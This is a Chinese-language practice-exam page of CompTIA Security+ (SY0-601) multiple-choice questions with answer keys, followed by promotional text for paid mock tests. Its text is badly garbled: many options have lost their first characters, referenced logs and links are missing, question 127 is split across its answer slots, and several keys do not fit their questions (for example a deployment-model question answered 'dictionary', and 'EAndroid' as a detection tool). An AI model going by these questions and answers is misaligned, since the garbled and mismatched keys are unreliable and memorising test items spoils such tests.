一名安全分析員正在調查似乎是對企業網絡應用程序的未經授權訪問。安全分析員查看了網絡服務器日誌，發現了以下流水賬：正在發生以下哪種密碼攻擊？

A. ��典

B. ��力

C. 彩虹表

D. 噴塗

查看答案

正確答案: B

問題 #110

某企業計劃推出一項新的移動設備政策，並爲每位員工發放一臺新的筆記本電腦。這些筆記本電腦將遠程訪問用戶的企業操作系統，並允許他們將筆記本電腦用於工作角色之外的用途。正在使用以下哪種部署模式？

A. ��力

B. ��盤記錄器

C. ��典

D. ainbow

查看答案

正確答案: C

問題 #111

在內部網絡上檢測到未經授權的設備。這些設備的位置被追蹤到會議室的以太網端口。以下哪項是防止這些設備訪問內部網絡的最佳技術控制措施？

A. AC

B. LP

C. DS

D. FA

查看答案

正確答案: A

問題 #112

爲了降低和限制軟件和基礎設施成本，首席信息官要求將電子郵件服務遷移到雲端。雲提供商和組織必須有安全控制措施來保護敏感數據。以下哪種雲服務能滿足 BEST 的要求？

A. aaS

B. PaaS

C. aaS

D. SaaS

查看答案

正確答案: D

問題 #113

安全管理員每周對所有雲資產執行漏洞掃描，並提供詳細報告。以下哪項描述了管理員的活動？

A. ��續部署

B. ��續集成

C. 數據所有者

D. 數據處理器

查看答案

正確答案: D

問題 #114

首席信息安全官（CISO）要求第三方供應商提供證明文件，表明已採取適當控制措施保護客戶數據。第三方供應商最好向首席信息安全官提供以下哪項？

A. GDPR 合規證明

B. 雲安全聯盟材料

C. OC 2 第 2 類報告

D. NIST RMF 工作手冊

查看答案

正確答案: C

問題 #115

以下哪項描述了一種試圖利用人的緊迫感的社交工程技術？

A. ��封釣魚電子郵件，稱已獲得現金補償，但即將過期

B. ��條提示包裹已安排領取的釣魚信息

C. ��求向當地慈善機構捐款的釣魚電話

D. ��稱是調查網絡犯罪的便衣執法人員的 SPIM 通知

查看答案

正確答案: C

問題 #116

在事件響應期間，分析師在邊界防火牆上對所有入站流量應用了規則，並在每個關鍵服務器上實施了 ACL。調查之後，公司意識到自己仍然很脆弱，因爲出站流量沒有受到限制，而且對手能夠在網絡中保持存在。對手目前處於網絡殺傷鏈的以下哪個階段？

A. 偵察

B. 指揮和控制

C. 關於目標的行動

D. 剝削

查看答案

正確答案: B

問題 #117

安全分析人員注意到，在一天中的特定時間，網絡會被惡意數據包淹沒。分析人員應該使用以下哪種方法來調查這個問題？

A. 網絡元數據

B. 帶寬監控器

C. ��統文件

D. 關聯儀錶板

查看答案

正確答案: B

問題 #118

一名安全工程師正在爲一家公司部署新的無線網絡。該公司與多個租戶共享辦公空間。工程師應在無線網絡上配置以下哪項，以確保機密數據不會暴露給未經授權的用戶？

A. AP

B. LS

C. TTPS

D. ES

查看答案

正確答案: D

問題 #119

在收集證據並提供給當局時，以下哪項用於確保證據在法律訴訟中的可採性？

A. 監管鏈

B. 法律持有

C. 事件日誌

D. 手工藝品

查看答案

正確答案: A

問題 #120

網絡安全管理員需要在網絡上實施第 7 層安全控制並阻止潛在攻擊。以下哪項可以阻止第 7 層的攻擊？

A. IDS

B. IPS

C. SM

D. AF

E. AC

F. IDS

查看答案

正確答案: BD

問題 #121

在進入一棟安全大樓的途中，一名身份不明的人與一名員工攀談起來。該員工在門口掃描所需的徽章，而不明身份者似乎出於禮貌爲該員工開門。這是利用了以下哪種社交工程技術？

A. 肩部衝浪

B. ��洞攻擊

C. 尾隨

D. 冒名頂替

查看答案

正確答案: C

問題 #122

一名取證調查員正在檢查該公司網站上報告的一些未經授權的付款。一些不尋常的日誌記錄顯示，用戶收到了一封不受歡迎的郵件列表的電子郵件，並點擊了一個鏈接試圖取消訂閱。其中一名用戶向網絡釣魚小組報告了這封電子郵件，轉發的電子郵件顯示該鏈接爲：單擊此處取消訂閱以下哪項是法證調查員需要處理的？

A. QL注入

B. ��證失敗

C. SS

D. XSRF

查看答案

正確答案: D

問題 #123

安全分析員需要編寫一份文檔，詳細說明安全事故是如何發生的，採取了哪些恢復步驟，以及如何避免未來事故的發生。這項活動將在響應流程的以下哪個階段進行？

A. 恢復

B. 識別

C. 經驗教訓

D. 準備工作

查看答案

正確答案: C

問題 #124

一名員工的移動設備收到多條信息。這些信息指示該員工將設備與未知設備配對。以下哪項最恰當地描述了惡意程序可能導致這一問題發生的原因？

A. 幹擾

B. luesnarfing

C. ��惡雙胞胎攻擊

D. 流氓接入點

查看答案

正確答案: B

問題 #125

以下哪種類型的災難恢復計劃演練對 IT 運行的幹擾最小？

A. 平行

B. 全面

C. ��面

D. ��擬

查看答案

正確答案: C

問題 #126

某公司希望改善終端用戶登錄可信合作夥伴網站時的體驗。該公司不希望用戶獲得合作夥伴網站的單獨憑據。要讓用戶使用自己的憑據登錄可信合作夥伴的網站進行身份驗證，應實施以下哪項？

A. ��錄服務

B. AAA 服務器

C. 聯邦

D. ��因素身份驗證

查看答案

正確答案: C

問題 #127

一名安全工程師正在查看一個 SAML 應用程序的日誌，該應用程序被配置爲使用 MF

A. ��這次審查中，工程師注意到大量不需要 MFA 的成功登錄來自正在國際旅行的用戶。該應用程序無需 VPN 即可訪問，其策略允許生成基於時間的令牌。改變地點的用戶應被要求重新進行身份驗證，但他們無需重新進行身份驗證即可登錄。以下哪種說法最能說明問題？

B.

C.

D.

E.

查看答案

正確答案: D

問題 #128

以下哪項可用於檢測通過 80 端口竊取公司數據的黑客？

A. GPS 標記

B. 遠程擦拭

C. ��幕鎖定計時器

D. EAndroid

查看答案

正確答案: D

問題 #129

在一次安全事件調查中，一名分析師查看了公司的 SIEM，發現一個事件涉及到一個已知的惡意命令控制服務器的高流量。分析員希望確定可能受此問題影響的公司工作站數量。以下哪項可以提供該信息？

A. WAF 日誌

B. DNS 日誌

C. 系統日誌

D. 應用程序日誌

查看答案

正確答案: B

問題 #130

安全分析人員需要能夠在一個工具中搜索和關聯多個來源的日誌。以下哪項 BEST 能讓安全分析師具備這種能力？

A. OAR

B. SIEM

C. ��誌收集器

D. ��絡附加存儲

查看答案

正確答案: B

問題 #131

如果當前的私人密鑰被泄露，以下哪項能確保它不能用於解密所有歷史數據？

A. ��美的前向保密

B. 橢圓曲線加密法

C. 關鍵拉伸

D. ��態加密

查看答案

正確答案: A

問題 #132

一個用戶的賬戶經常被鎖定。經過進一步檢查，安全分析員在 SIEM 中發現了以下內容：以下哪項描述了正在發生的情況？

A. 攻擊者正在利用密碼噴射攻擊賬戶。

B. 攻擊者正在利用字典攻擊賬戶。

C. ��擊者正在對賬戶進行暴力破解。

D. ��擊者正在利用彩虹表攻擊賬戶。

查看答案

正確答案: C

問題 #133

一位業務運營經理擔心，一臺對業務運營至關重要的 PC 很快就會出現代價高昂的硬件故障。該經理正在尋找既能繼續業務運營，又不會產生巨額成本的方案。以下哪種方法可以減輕該經理的擔憂？

A. ��施全面系統升級。

B. ��行物理到虛擬的遷移。

C. ��裝不間斷電源。

D. ��買網絡安全保險。

查看答案

正確答案: B

問題 #134

一家公司最近發生了一起數據泄露事件，經查，源頭是一名正在公共場所給手機充電的高管。以下哪項措施最有可能防止這次數據泄露？

A. ��火牆

B. 設備引腳

C. USB 數據攔截器

D. 生物統計學

查看答案

正確答案: C

問題 #135

以下哪項說明在源代碼中發現了隱藏音頻文件？

A. 隱寫術

B. 同態加密

C. ��碼套件

D. 區塊鏈

查看答案

正確答案: A

問題 #136

對醫療結算申請的例行審計發現，有幾份申請是在用戶不知情的情況下提交的。對醫療收費公司系統審計日誌的審查表明，公司一名員工下載了客戶記錄，並將直接存款信息調整到了個人銀行賬戶。

A. ��部威脅

B. ��會工程學

C. 第三方風險

D. ��據泄露

查看答案

正確答案: A

問題 #137

一家公司在不同國家推出了一個網站，目的是獲取用戶信息，供營銷企業使用。公司本身不會使用這些信息。該公司承擔以下哪些角色？

A. 數據所有者

B. 數據處理器

C. ��據管理員

D. 數據收集器

查看答案

正確答案: D

問題 #138

一家加密採礦公司最近在其所有採礦系統中部署了一種新的殺毒軟件。在許多個人設備上測試了殺毒軟件的安裝，沒有發現任何問題。一旦防病毒程序推廣到服務器，就不斷有問題報告。因此，公司決定刪除該挖礦軟件。殺毒軟件最有可能將該軟件歸類爲：

A. rootkit。

B. PUP。

C. 後門

D. ��索軟件

E. RAT

查看答案

正確答案: B

問題 #139

一名用戶正試圖使用臺式機從公司網絡內部導航到一個網站。當用戶輸入 URL https://www.site.com 時，瀏覽器會發出證書不匹配警告。而用戶訪問 http://www.anothersite.com 時不會收到警告。以下哪項描述了這種攻擊？

A. ��徑上

B. 域名劫持

C. NS中毒

D. 邪惡雙胞胎

查看答案

正確答案: B

問題 #140

某企業正在放棄使用客戶端和服務器端證書的 EAP。公司希望新的 EAP 解決方案能夠檢測惡意接入點。以下哪種方法可以滿足這些要求？

A. EAP

B. AP-FAST

C. AP-TLS

D. AP-TTLS

查看答案

正確答案: B

問題 #141

一家公司的董事會與一家保險公司籤訂合同，以限制該組織的責任。這最好地描述了以下哪種風險管理做法？

A. ��移

B. 規避

C. 緩解

D. 致謝

查看答案

正確答案: A

問題 #142

用戶的筆記本電腦經常斷開 Wi-Fi 網絡連接。筆記本電腦重新連接後，用戶可以上網，但無法訪問共享文件夾或其他網絡資源。該用戶最有可能遇到以下哪種類型的攻擊？

A. ��持飛機

B. ��擾

C. 流氓接入點

D. 邪惡雙胞胎

查看答案

正確答案: D

問題 #143

滲透測試人員正在對一個應用程序進行模糊測試，以確定堆棧的 EIP 在內存中的位置。滲透測試人員計劃執行以下哪種攻擊？

A. ��賽條件

B. ��遞哈希值

C. ��衝區溢出

D. SS

查看答案

正確答案: C

問題 #144

一名管理員需要保護用戶密碼，並被建議對密碼進行散列處理。以下哪項最恰當地描述了建議管理員做的事情？

A. 對密碼進行數學運算，將其轉換爲唯一字符串。

B. ��密碼中添加額外數據，從而增加密碼長度，使其更難被暴力破解。

C. ��系統中的所有密碼集中存儲在彩虹表中。

D. 強制使用一次性密碼，每次登錄會話都要更改。

查看答案

正確答案: A

問題 #145

一家小型企業的系統管理員在檢查無線路由器時，發現有人在欺騙授權設備的 MAC 地址。鑑於下表所示：要在不影響可用性的情況下檢測是否存在惡意系統，管理員下一步應該採取以下哪項措施？

A. ��行 ping 掃描、

B. ��際檢查每個系統

C. ��絕 "UNKNOWN "主機名訪問互聯網。

D. ��用 MAC 過濾

查看答案

正確答案: A

問題 #146

通過創建用戶常用登錄屬性的基線，建立了一個跟蹤遠程訪問請求的安全建議。當檢測到基線偏差時，將觸發 MFA 挑戰。要部署該建議，應配置以下哪項？

A. 情境感知身份驗證

B. ��時驗證等價物

C. ��泛的身份驗證協議

D. ��代理網絡訪問控制

查看答案

正確答案: A

問題 #147

分析人員收到網絡上一臺主機信標活動的多個警報。分析員在分析這些活動後，觀察到以下活動：-一名用戶在網絡瀏覽器中輸入 comptia.org。-出現的網站不是 comptia.org 網站。

A. ��徑攻擊

B. NS中毒

C. ��位器（URL）重定向

D. ��名劫持

查看答案

正確答案: C

問題 #148

以下哪項最恰當地描述了記錄誰有權接觸證據的過程？

A. 波動順序

B. 監管鏈

C. 不否認

D. 可否受理

查看答案

正確答案: B

問題 #149

在護送未經許可的人員時，以下哪項規定可追究工作人員的責任？

A. 鎖

B. 徽章

C. 攝像機

D. 遊客日誌

查看答案

正確答案: D

問題 #150

以下哪種流程會使用一種允許在流程結束後重複使用存儲設備的方法來消除數據？

A. 粉碎

B. 覆寫

C. 粉碎

D. 消磁

查看答案

正確答案: B

問題 #151

一位安全分析師需要集中管理公司網絡設備的憑證和權限。必須滿足以下安全要求：-必須記錄網絡工作人員執行的所有操作。-必須允許按命令分配權限。-身份驗證服務器和設備必須通過 TCP 進行通信。

A. Kerberos

B. HAP

C. ACACS+

D. ADIUS

查看答案

正確答案: C

問題 #152

安全架構師需要在會議室部署一些工作站，以便在大屏幕上顯示敏感數據。由於數據的性質，這些數據不能存儲在會議室中。文件共享位於本地數據中心。安全架構師應建議使用以下哪種方法來最好地滿足要求？

A. 霧計算和 KVM

B. ��擬桌面和瘦客戶機

C. ��有雲和 DLP

D. ��硬盤加密和厚客戶機

查看答案

正確答案: B

不想錯過任何事？

100%通過的Cisco、PMP、CISA、CISM、AWS模擬測試現已發售！
立即獲取

通過 SY0-601 模擬測試爲 CompTIA Security+ 考試做好戰略準備

提交後看答案

不想錯過任何事？

100%通過的Cisco、PMP、CISA、CISM、AWS模擬測試現已發售！ 立即獲取

通過 SY0-601 模擬測試爲 CompTIA Security+ 考試做好戰略準備

提交後看答案

100%通過的Cisco、PMP、CISA、CISM、AWS模擬測試現已發售！
立即獲取